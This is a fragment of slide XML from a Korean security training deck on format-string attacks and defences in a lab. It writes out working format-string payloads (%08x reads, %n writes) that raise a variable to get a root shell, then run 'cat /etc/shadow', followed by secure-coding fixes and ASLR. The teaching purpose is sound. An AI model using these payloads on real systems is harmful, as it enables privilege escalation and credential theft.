              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>objdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> -M intel -d /sec/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>fmstr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> | more</a:t>
            </a:r>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/sec/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>fmstr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>실행</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>$ /sec/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>fmstr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> A</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en-US" altLang="ko-KR" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>pass </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>변수의 주소는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>0xbfffead0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>임을 확인</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>단</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>변수의 주소는 일부 변경될 수 있음</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a: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pass </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>변수 조작 준비</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>$ /sec/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>fmstr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> $(python -c 'print   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>       "\xd0\xea\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>xbf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>"+“%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x“’)</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%08x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>는 총 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>개임</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>. pass </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>변수의 주소는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>0xbfffeaa0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>임</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" err="1"/>
              <a:t>명령행</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> 인자 길이에 따라 변경될 수 있음</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="100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/Intro</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>사이버전</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>? </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Montserrat"/>
              </a:rPr>
              <a:t>아시아태평양 국가보안 전망 보고서</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Montserrat"/>
              </a:rPr>
              <a:t>(2016 Deloitte Asia-Pacific Defense Outlook</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="90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/Environ/WSL2</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" err="1"/>
              <a:t>WSL2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>  윈도우 탐색기에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>“store” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>를 검색한 후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>Microsoft </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>Strore</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>실행 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="100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2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>검색 버튼을 눌러서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>“windows terminal” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>을 검색하고</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>설치</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="100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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t> [1]</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>%08x’</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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6) pass </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>변수 조작 시도</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>$ /sec/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>fmstr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> $(python -c 'print</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>        "\xa0\xea\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>xbf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>"+“%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08n“’)</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pass </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>변수의 값이 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>76</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="100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7) pass </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>변수의 값이 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>144</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>가 되도록 공격 및 루트 권한으로 실행할 명령 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" err="1"/>
              <a:t>입력창</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>fmstr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> $(python -c 'print</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>       "\xa0\xea\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>xbf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>"+“%08x.%08x.%08x.%08x.%08x.%08x.%08x.%76x.%08n“’)</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pass </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>변수의 값이 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>144</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>로 변경되어 루트 권한으로 명령을 실행시킬 수 있는 프롬프트가 등장</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR"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8) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>루트 권한이 필요한 명령 실행</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># cat /etc/shadow</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="100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a:t>1) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>다시 공격을 실시하여 루트 권한 쉘 획득 및 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>acheck </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>입력</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># acheck</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="100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/Training/Unit/Sys/11</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> 11. Format String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>공격 및 방어 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>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/sec/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="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5.5)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="100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test </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>계정으로 전환 후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>디렉터리 이동</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>su</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> test</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>$ cd /sec</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>2) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>다음 명령을 입력하여 루트 권한으로 명령을 실행할 수 있음을 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>$ ./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>fmstr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> $(python -c 'print</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>"\xa0\xea\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>xbf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>"+“%08x.%08x.%08x.%08x.%08x.%08x.%08x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.%76x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>.%08n</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>루트 권한이 필요한 명령 실행</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># cat /etc/shadow</a:t>
            </a:r>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>루트 계정으로 복귀</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>$ exit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>5) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>fmtstring.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>소스 코드 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>vi /sec/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>fmtstring.c</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en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>snprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="100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취약한 부분 수정</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" err="1"/>
              <a:t>시큐어</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> 코딩</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>snprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> → </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>strncpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (buff, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[1], sizeof(buff));</a:t>
            </a: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r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>6) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>fmstr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" err="1"/>
              <a:t>재빌드</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> –o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>fmstr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>fmtstring.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> getRoot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>.o</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7) ASLR </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>활성화</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>sysctl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> –w kernel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>randomize_</a:t>
            </a:r>
